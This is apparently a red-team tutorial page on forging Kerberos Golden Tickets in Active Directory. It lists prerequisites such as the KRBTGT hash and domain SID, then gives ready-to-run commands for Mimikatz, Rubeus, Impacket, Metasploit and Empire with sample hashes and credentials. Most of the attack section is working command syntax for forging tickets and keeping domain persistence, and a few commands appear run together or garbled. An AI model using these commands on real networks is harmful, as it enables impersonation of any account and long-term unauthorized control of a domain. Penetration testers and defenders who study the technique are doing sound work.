Understanding Kerberos Golden Tickets

A Golden Ticket attack is a post-exploitation technique that involves creating a forged Kerberos Ticket-Granting Ticket (TGT) to gain unauthorized access to a network. This attack typically requires compromising the security of a Key Distribution Center (KDC) or domain controller.

ATT&CK ID:T1558.001

Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as golden tickets. Golden tickets enable adversaries to generate authentication material for any account in the Active Directory.

Understanding the Golden Ticket Attack

Golden Ticket attack exploits vulnerabilities within the Kerberos authentication protocol, which is a fundamental component of AD used for user authentication and authorization.

By manipulating Kerberos tickets, attackers or security professionals gain unauthorized and persistent access to a network, allowing them to move laterally across critical systems and resources.

Requirements to forge a Golden Ticket

After an initial compromise happens an attacker tries to escalate privileges to an Administrator account

🔴

Full domain compromise (Domain Admin) is required with KRBTGT Hash

💡

NTLM Hash or AES256 Hash?

Info	Example	Tips
Domain	poplabsec.rfs
Domain SID	S-1-5-21-3523557010-2506 964455-2614950430	Remember to remove the RID at the end of SID
KRBTGT NTLM / AES256 Hash	f3bc61e97fb14d18c42bcbf6c3a9055f

List of Tools

Tool	Git
MimiKatz	https://github.com/gentilkiwi/mimikatz
Rubeus	https://github.com/GhostPack/Rubeus
Impacket	https://github.com/SecureAuthCorp/impacket
Metasploit	https://www.metasploit.com/

How to Create Golden Tickets with MimiKatz?

💡

Check the parameter /ptt - it opens a new shell with the created ticket in that session.

mimikatz kerberos::golden /domain:poplabsec.rfs /sid:<string> /user:Administrator /krbtgt:<NTLM Hash> /ptt

How to Create Golden Tickets with Rubeus?

rubeus.exe hash /user:rfs /domain:poplabsec.rfs /password:Password@1

rubeus.exe golden /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /ldap /user:rfs /printcmd

How to Create Golden Tickets with Impacket?

pythonsecretsdump.pyadministrator:Paa@987@192.168.1.105 -outputfile krb -user-status

How to Create Golden Tickets with Metasploit?

load kiwi

dcsync_ntlm krbtgt

golden_ticket_create -d poplabsec.rfs -u rfs -s S-1-5-21-3523557010-2506964455-2614950430 -k f3bc61e97fb14d18c42bcbf6c3a9055f -t /root/Desktop/ticket.kirbi

How to Create Golden Tickets with Empire?

usemodule credential/mimikatz/golden_ticket
set domain
set sid
set user rfs
set group
set id 500
set krbtgt_hash

Golden Tickets Time

10 years by default

Kerberos Golden Tickets

Domain Persistence with Kerberos Golden Ticket attack.

Table of contents